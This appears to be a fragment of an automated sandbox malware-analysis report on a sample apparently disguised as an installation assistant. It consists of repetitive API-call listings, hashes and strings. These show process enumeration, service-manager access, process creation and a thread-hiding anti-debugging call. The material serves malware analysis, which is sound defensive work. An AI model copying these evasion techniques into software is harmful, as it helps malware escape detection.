32 API calls std::_Xinvalid_argument 99997->100025 100001->99868 100002->99893 100003->99918 100005 6ce452a0 std::locale::_Setgloballocale 100004->100005 100006 6ce45277 CloseHandle 100005->100006 100007 6ce45320 Process32NextW 100005->100007 100008 6ce453b1 100005->100008 100009 6ce45345 Process32FirstW 100005->100009 100006->100005 100007->100005 100008->99845 100009->100005 100010->99864 100012->99846 100014 6ce1b743 _Yarn __wsopen_s std::locale::_Setgloballocale 100013->100014 100015 6ce1c180 100014->100015 100017 6ce1bced CreateFileA 100014->100017 100018 6ce1aa30 100014->100018 100015->99988 100017->100014 100021 6ce1aa43 __wsopen_s std::locale::_Setgloballocale 100018->100021 100019 6ce1b43d WriteFile 100019->100021 100020 6ce1b3e9 WriteFile 100020->100021 100021->100019 100021->100020 100022 6ce1b718 100021->100022 100023 6ce1ab95 ReadFile 100021->100023 100022->100014 100023->100021 100024->99995 100025->99996 100026->99995 100027->99995 100028->99995
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: HR^
                                • API String ID: 4218353326-1341859651
                                • Opcode ID: 1224f8483f72399d39269c476cd42dc528f36c49a4760d6a64fb1a0e38d0475b
                                • Instruction ID: 0940754833028771d80f31c3973c1ac06b4c796905158a3bf1b764c961c2c8ce
                                • Opcode Fuzzy Hash: 1224f8483f72399d39269c476cd42dc528f36c49a4760d6a64fb1a0e38d0475b
                                • Instruction Fuzzy Hash: 57740571744B018FC728CF29C8D0A96B7F3FF95318B198A6DC0A68BA55E774B44ACB41
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: }jk$;T55$L@^
                                • API String ID: 0-4218709813
                                • Opcode ID: f926644d7730bb8f0d983f1a9bda07c7131201a636865a7f8a612cdaf2add78b
                                • Instruction ID: 51e0eda2aa01bc8f7f9f621a59b00c9628b2ea884ada3e24e214bba76ffc2f91
                                • Opcode Fuzzy Hash: f926644d7730bb8f0d983f1a9bda07c7131201a636865a7f8a612cdaf2add78b
                                • Instruction Fuzzy Hash: DF340871644B018FC728CF29C8D0A96B7F3FFD5318B1A8A6DC1964BA55EB34B44ACB50

                                Control-flow Graph

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CE4524E
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3332741929-0
                                • Opcode ID: da6ecf67cefe0941676726e15d05b7464a42baf6c66dc65ce8d0ffc122078ccc
                                • Instruction ID: 4a85a7f0eeeffabbd61c15df6e32917d7804eb091350d200c75442c62972a9a4
                                • Opcode Fuzzy Hash: da6ecf67cefe0941676726e15d05b7464a42baf6c66dc65ce8d0ffc122078ccc
                                • Instruction Fuzzy Hash: 42316D7460A3009FD7109F28DC88B0ABBF5AF96748FA0892EF598D7760D371D8498B57

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6aab1d457ebed03b4715733f389b754310652321a9f9f5e1c09f2e7e71214aff
                                • Instruction ID: f530203ea79ae266aa033d22bf87fe323121091a99f333b762568eb6387d4344
                                • Opcode Fuzzy Hash: 6aab1d457ebed03b4715733f389b754310652321a9f9f5e1c09f2e7e71214aff
                                • Instruction Fuzzy Hash: 2432F032345B018FC324CF29D8D06E6B7E3EFD131472D8A6DC0AA4BA95E774B44A8B51

                                Control-flow Graph
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID:
                                • API String ID: 2882836952-0
                                • Opcode ID: 0efd547003c209197dd08e0bc644ac1c4abd4b5df922681b3441e155f228f6a2
                                • Instruction ID: 4d880657ff52c8dbf42f78623b7d1d21cdf03fd3ba305d8a6169a92466bbddc6
                                • Opcode Fuzzy Hash: 0efd547003c209197dd08e0bc644ac1c4abd4b5df922681b3441e155f228f6a2
                                • Instruction Fuzzy Hash: C251F1716587018FC320CF29D8807D5B7B3BF92314F698A5DC0E65BA95EB74B44A8B42
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID:
                                • API String ID: 2882836952-0
                                • Opcode ID: 996b0af83de1eaf8d68ec6bba87193903955167e17d049498c8d20f9c771b230
                                • Instruction ID: 673ad0add181ed7826d90406ff278127068248c78177c06bea0ddb49a178aa37
                                • Opcode Fuzzy Hash: 996b0af83de1eaf8d68ec6bba87193903955167e17d049498c8d20f9c771b230
                                • Instruction Fuzzy Hash: EC51E171618B018FC320CF29D4807D5B7B3BF96314F698B5DC0E65BA95EB70B44A8B92
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6CCC3E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CCC3EAA
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: b5b3638eb7c07f3c6a5d65ac87e1e41bb2e7cf4a5d141612f7feca5cd75d8d9d
                                • Instruction ID: f0d38b4db4a1239afbe367aee42534d144d745e7815527abf62cdf8f754592c9
                                • Opcode Fuzzy Hash: b5b3638eb7c07f3c6a5d65ac87e1e41bb2e7cf4a5d141612f7feca5cd75d8d9d
                                • Instruction Fuzzy Hash: F0312231659B018FC720CF68C8847D6B7B3BF96314F298E5DC0E65BA81EB74740A8B52
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6CCC3E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CCC3EAA
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: 70bb9bdde31720d577d846aaa85c16dd19b21d5ad337a17e119305c1dae92d15
                                • Instruction ID: 3152d5203924c2b3e0977a8c001acaffb68453d42d544dfea1444cab8600d869
                                • Opcode Fuzzy Hash: 70bb9bdde31720d577d846aaa85c16dd19b21d5ad337a17e119305c1dae92d15
                                • Instruction Fuzzy Hash: 6031E1312147018FC724CF68C4947E6BBB2BF96308F298E5DC0E65BA85EB71B4458B52
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6CCC3E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CCC3EAA
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: 18f900d1254929d4d5fc0bd036eec52ec5a0f43a9b70fd21d5de7be6306b4d84
                                • Instruction ID: 65beb3f6ca74a5b438c43c74219d820ba000af52eb69ad8ea1e5d45834b5d9a0
                                • Opcode Fuzzy Hash: 18f900d1254929d4d5fc0bd036eec52ec5a0f43a9b70fd21d5de7be6306b4d84
                                • Instruction Fuzzy Hash: 6421F4703587018FD724CF65D8947E677B2BF52308F288E5DC0E69BA91EB74A4058B53
                                APIs
                                • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CE45130
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ManagerOpen
                                • String ID:
                                • API String ID: 1889721586-0
                                • Opcode ID: 96b558ee66d1d1aa6f8815f9c29a24129b423f635597016b34d82f4409bba71c
                                • Instruction ID: 7079432dca77157d27db9c3a891d3c27d819cff5a4b8d03ddace1e1d629082b7
                                • Opcode Fuzzy Hash: 96b558ee66d1d1aa6f8815f9c29a24129b423f635597016b34d82f4409bba71c
                                • Instruction Fuzzy Hash: 7B312AB4A09741EFC7109F28D544B0ABBF0EB8A758F60899EF888D6361C371C945DB63
                                APIs
                                • FindFirstFileA.KERNEL32(?,?), ref: 6CE3AEDC
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: 1d9f7c89bcfee6a06a3f8d9be826018b72adec11b1e2efeb92e74156b229f2ae
                                • Instruction ID: a17e0e0b273d722e221e118133b7f75d48079a80823f06b02cdd7574f8ab1f19
                                • Opcode Fuzzy Hash: 1d9f7c89bcfee6a06a3f8d9be826018b72adec11b1e2efeb92e74156b229f2ae
                                • Instruction Fuzzy Hash: 371128B45483609FDB109E68D94550E7BF4BF86318F249E59F4A8CB7A1D334DC85CB22
                                APIs
                                • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CE1ABA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                • API String ID: 2738559852-1563143607
                                • Opcode ID: 545b17e7fac2291bad674b68bdb77502d64e79e89392a51f93646fd7af6c7180
                                • Instruction ID: b77b46b40089e9d5d2f2484e5e0a153e8817f70ae85a27cfaf0d4cd8ae784fe7
                                • Opcode Fuzzy Hash: 545b17e7fac2291bad674b68bdb77502d64e79e89392a51f93646fd7af6c7180
                                • Instruction Fuzzy Hash: B4625DB064D3818FC724CF18C490A6ABBF2ABDA314F248D1EE599C7B51D734D9568B43

                                Control-flow Graph
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8Q
                                • API String ID: 0-4022487301
                                • Opcode ID: 11ff63a894c2ba27df20e099ce21b9e8f58956a0e1efce4101bb45271769bc44
                                • Instruction ID: be085ec1f6f21e30909023483eabc26415be7208a12cb7e29f284d599270c9ae
                                • Opcode Fuzzy Hash: 11ff63a894c2ba27df20e099ce21b9e8f58956a0e1efce4101bb45271769bc44
                                • Instruction Fuzzy Hash: BBC1D470F04249AFDB01EF98C890BADBBB1AF4E31CFB04159E510AB781C7769956CB61

                                Control-flow Graph
                                APIs
                                  • Part of subcall function 6CE64457: CreateFileW.KERNEL32(00000000,00000000,?,6CE64115,?,?,00000000,?,6CE64115,00000000,0000000C), ref: 6CE64474
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE64180
                                • __dosmaperr.LIBCMT ref: 6CE64187
                                • GetFileType.KERNEL32(00000000), ref: 6CE64193
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE6419D
                                • __dosmaperr.LIBCMT ref: 6CE641A6
                                • CloseHandle.KERNEL32(00000000), ref: 6CE641C6
                                • CloseHandle.KERNEL32(6CE5B0D0), ref: 6CE64313
                                • GetLastError.KERNEL32 ref: 6CE64345
                                • __dosmaperr.LIBCMT ref: 6CE6434C
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: 8Q
                                • API String ID: 4237864984-4022487301
                                • Opcode ID: 227509586b69a7f54bf5d54f964432796ec4b7cb7473e98bf0d829a1b8a71846
                                • Instruction ID: d6b13969c2bc22bb9e54621e4f20b70b13047f67421837adc759ffc50557f972
                                • Opcode Fuzzy Hash: 227509586b69a7f54bf5d54f964432796ec4b7cb7473e98bf0d829a1b8a71846
                                • Instruction Fuzzy Hash: 77A15932A641549FCF09DF69D8617AE7BB1EB07328F38424EE811AFB81C7358916CB51

                                 Control-flow Graph (figure omitted): function starting at 6ce1c1e0, with calls to WriteFile and ReadFile
                                Similarity
                                • API ID:
                                • String ID: :uW$;uW$;uW$> 4!$> 4!
                                • API String ID: 0-4100612575
                                • Opcode ID: 620543d34c0910528ee4c94123f0be361f24d07b9d09173695434b9b732d2246
                                • Instruction ID: b6a48226bf7b7f22c91c37cc0a9f4bf206cede364753ea1731d88e0cf5a08cc3
                                • Opcode Fuzzy Hash: 620543d34c0910528ee4c94123f0be361f24d07b9d09173695434b9b732d2246
                                • Instruction Fuzzy Hash: 3C717AB0208745AFD710DF55C480B9ABBF4BF8A708F20492EF498D6B51D375D859CB92
                                Similarity
                                • API ID:
                                • String ID: K?Jo$K?Jo$`Rlx$7eO
                                • API String ID: 0-174837320
                                • Opcode ID: 8a5deaba0c3ba7129e0d86a780dbbd44977c0e28f6a11366706975b29ae0343c
                                • Instruction ID: e28652f87062710090df32791169d4d938b7168e2cfcb2308fa1009f2c09206f
                                • Opcode Fuzzy Hash: 8a5deaba0c3ba7129e0d86a780dbbd44977c0e28f6a11366706975b29ae0343c
                                • Instruction Fuzzy Hash: 9B4235B4A1D3418FC755CE28C090A1ABBF1AF8A318F288E1EF59587B60D734D865CB53
                                Similarity
                                • API ID:
                                • String ID: ;T55
                                • API String ID: 0-2572755013
                                • Opcode ID: f5a0055250709944c30d8f2360748a8cc66607d2abaf3c1dc913cccd7ace9f9c
                                • Instruction ID: 3e1d9241b4a746f0ecfbd97b5fdd7d70a21cecb565d111d4c165948fdb32e1ff
                                • Opcode Fuzzy Hash: f5a0055250709944c30d8f2360748a8cc66607d2abaf3c1dc913cccd7ace9f9c
                                • Instruction Fuzzy Hash: 8F03E431645B018FC728CF29C8D06A5B7E3BFD532471ECA6DC0A64BA95EB74B44ACB50

                                 Control-flow Graph (figure omitted): function starting at 6ce44ff0, with calls to CreateProcessA, WaitForSingleObject and CloseHandle
                                Similarity
                                • API ID: CreateProcess
                                • String ID: D
                                • API String ID: 963392458-2746444292
                                • Opcode ID: 4fe5c406620bdce2cad996f504577e85fdf7b0303480c4b20a7b5f06c5640c26
                                • Instruction ID: 2f1bff74100a1ed2e837a9b82b8fe80d53b75b37f11250c7a3bf3c854d817586
                                • Opcode Fuzzy Hash: 4fe5c406620bdce2cad996f504577e85fdf7b0303480c4b20a7b5f06c5640c26
                                • Instruction Fuzzy Hash: 2631E37181A3808FD740DF28D19872ABBF0EB9A318F509A1DF8D996250E7759589CF43

                                 Control-flow Graph (figure omitted): function starting at 6ce5bc5e, with calls to WriteFile and GetLastError
                                APIs
                                  • Part of subcall function 6CE5BEB1: GetConsoleCP.KERNEL32(?,6CE5B0D0,?), ref: 6CE5BEF9
                                • WriteFile.KERNEL32(?,?,6CE646EC,00000000,00000000,?,00000000,00000000,6CE65AB6,00000000,00000000,?,00000000,6CE5B0D0,6CE646EC,00000000), ref: 6CE5BDAF
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CE646EC,6CE5B0D0,00000000,?,?,?,?,00000000,?), ref: 6CE5BDB9
                                • __dosmaperr.LIBCMT ref: 6CE5BDFE
                                Similarity
                                • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                • String ID: 8Q
                                • API String ID: 251514795-4022487301
                                • Opcode ID: ebff09ad5e8c22a47e7b5eca3e90cf4d2ddcb5292b3c74e4407d656a7e721f2e
                                • Instruction ID: ebc772309b309e07091d4b7998230818a267bbed80d9a027ce07d4ef1262b56e
                                • Opcode Fuzzy Hash: ebff09ad5e8c22a47e7b5eca3e90cf4d2ddcb5292b3c74e4407d656a7e721f2e
                                • Instruction Fuzzy Hash: 6951E671E0020EAFDB01DFA8C840BEEBB79EF0635CFB40555E600ABB41DB76995587A1

                                 Control-flow Graph (figure omitted): function starting at 6ce45b90 (internal calls only)
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CE45D31
                                Similarity
                                • API ID: Ios_base_dtorstd::ios_base::_
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 323602529-1866435925
                                • Opcode ID: 6d5cb0d2c7368df5782379839c01a8ce672a2458c667068e88e075cbd0304427
                                • Instruction ID: 3008703690e96e53ca7bfd488f79495c24ea92c387b3c96bf8497e552df65bd8
                                • Opcode Fuzzy Hash: 6d5cb0d2c7368df5782379839c01a8ce672a2458c667068e88e075cbd0304427
                                • Instruction Fuzzy Hash: 745153B5900B008FD725CF29D481B97BBF1BB49318F208A2DD8864BB91D775B909CB90

                                 Control-flow Graph (figure omitted): function starting at 6ce5b925, with calls to CloseHandle and GetLastError
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,6CE6425F), ref: 6CE5B97B
                                • GetLastError.KERNEL32(?,00000000,?,6CE6425F), ref: 6CE5B985
                                • __dosmaperr.LIBCMT ref: 6CE5B9B0
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID:
                                • API String ID: 2583163307-0
                                • Opcode ID: 99dceb74c43c859d2f7035e9dc09e0fce0fc73a28b3cd1a192a03da806a585ab
                                • Instruction ID: f47a1dc9a3da38ab275fa2f6e98adab817aac49a6d25fa75c1ccac78b9c3eb0e
                                • Opcode Fuzzy Hash: 99dceb74c43c859d2f7035e9dc09e0fce0fc73a28b3cd1a192a03da806a585ab
                                • Instruction Fuzzy Hash: 94016B33E591201AC202167B98457AE77754FC3B3CFB9530DE81587FC1CB62C8558290

                                 Control-flow Graph (figure omitted): function starting at 6ce50b9c (internal calls only)
                                Similarity
                                • API ID:
                                • String ID: 8Q
                                • API String ID: 0-4022487301
                                • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                • Instruction ID: cf3bb6ed618165251b8f0f06ef1743c67de66651eacb63fb665c0e633529678b
                                • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                • Instruction Fuzzy Hash: 13F0F4329016546AC6211A3ACC00BDB32B89F4337CFB00719F86197FD0DB77D52AC6A1
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CE45AB4
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CE45AF4
                                Similarity
                                • API ID: Ios_base_dtorstd::ios_base::_
                                • String ID:
